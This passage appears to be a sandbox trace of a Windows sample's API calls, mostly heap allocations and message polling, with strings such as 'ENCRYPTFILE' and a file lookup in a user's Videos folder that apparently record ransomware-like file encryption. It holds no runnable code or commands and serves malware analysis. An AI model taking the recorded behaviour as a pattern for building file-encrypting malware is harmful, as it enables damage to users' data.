wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0106.416] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8260 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0106.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0106.416] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0106.416] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0106.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0106.417] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0106.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0106.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27c0 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8388 [0106.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0106.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0106.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x190) returned 0x43e8260 [0106.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8388 | out: hHeap=0x1780000) returned 1 [0106.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0106.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0106.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0106.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0106.418] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0106.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0106.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0106.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0106.418] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0106.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0106.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0106.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.419] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\kdyPGegxQAqdUuFtfW.mkv", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd7fbae0, ftCreationTime.dwHighDateTime=0x1d5e2f4, ftLastAccessTime.dwLowDateTime=0x83865760, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0x83865760, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0x7644, dwReserved0=0x0, dwReserved1=0x8, cFileName="kdyPGegxQAqdUuFtfW.mkv", cAlternateFileName="KDYPGE~1.MKV")) returned 0x41ac700 [0106.419] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0106.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0106.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0106.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0106.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0106.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0106.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0106.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0106.419] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0106.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0106.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0106.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0106.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0106.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0106.421] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0106.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0106.421] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0106.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0106.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0106.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28c0 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0106.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0106.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28d0 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0106.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0106.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0106.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0106.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0106.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0106.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0106.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0106.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0106.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0106.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0106.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0106.423] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0106.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0106.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0106.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0106.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0106.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0106.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0106.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0106.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0106.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0106.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0106.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0106.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0106.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0106.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0106.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0106.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0106.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 